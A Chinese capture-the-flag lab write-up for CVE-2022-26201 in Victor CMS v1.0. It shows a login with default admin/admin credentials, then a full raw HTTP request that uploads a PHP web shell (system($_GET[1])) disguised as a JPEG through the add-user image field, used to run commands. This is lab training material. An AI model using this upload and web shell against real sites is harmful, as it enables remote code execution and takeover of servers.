春秋云境:CVE-2022-26201
文章合集:春秋云境系列靶场记录(合集)
关注WX:【小白SEC】查看更多内容……
Victor CMS v1.0 存在二次注入漏洞
漏洞介绍
Victor CMS v1.0 存在二次注入漏洞
解题步骤
题外话
此处发现应该有多个漏洞,题目中是要求通过二次注入,但是我没找到二次注入点,前文写过可以通过登录口的sql注入:春秋云境:CVE-2022-28060,登录后台后应该也有sql注入,但是这里我通过文件上传拿到flag,惭愧,进入正题
-
访问url,通过弱口令:admin/admin进入后台
-
在新增用户处新增用户:
-
抓包,修改图片内容与文件名:
POST /admin/users.php?source=add_user HTTP/1.1
Host: eci-2zc6z7gh1dt8e6gleuwb.cloudeci1.ichunqiu.com
Content-Length: 1752
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2t6bzezc716gw8delugh.cloudeci1.ichunqiu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7s8yO4CHxTiBV5R9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2t6bzezc716gw8delugh.cloudeci1.ichunqiu.com/admin/users.php?source=add_user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669346763,1669632114,1669640024,1669723832; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669726366; PHPSESSID=f495skuq4ob5qastg7igbcb442
Connection: close
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_name"
test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_firstname"
test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_lastname"
test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_image"; filename="testshell.php"
Content-Type: image/jpeg
<?php system($_GET[1]); phpinfo();?>
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_role"
Admin
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_email"
test@qq.com
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="user_password"
test
------WebKitFormBoundary7s8yO4CHxTiBV5R9
Content-Disposition: form-data; name="create_user"
Add User
------WebKitFormBoundary7s8yO4CHxTiBV5R9--
- 返回查看图片url,并执行命令获取flag:
文章合集:春秋云境系列靶场记录(合集)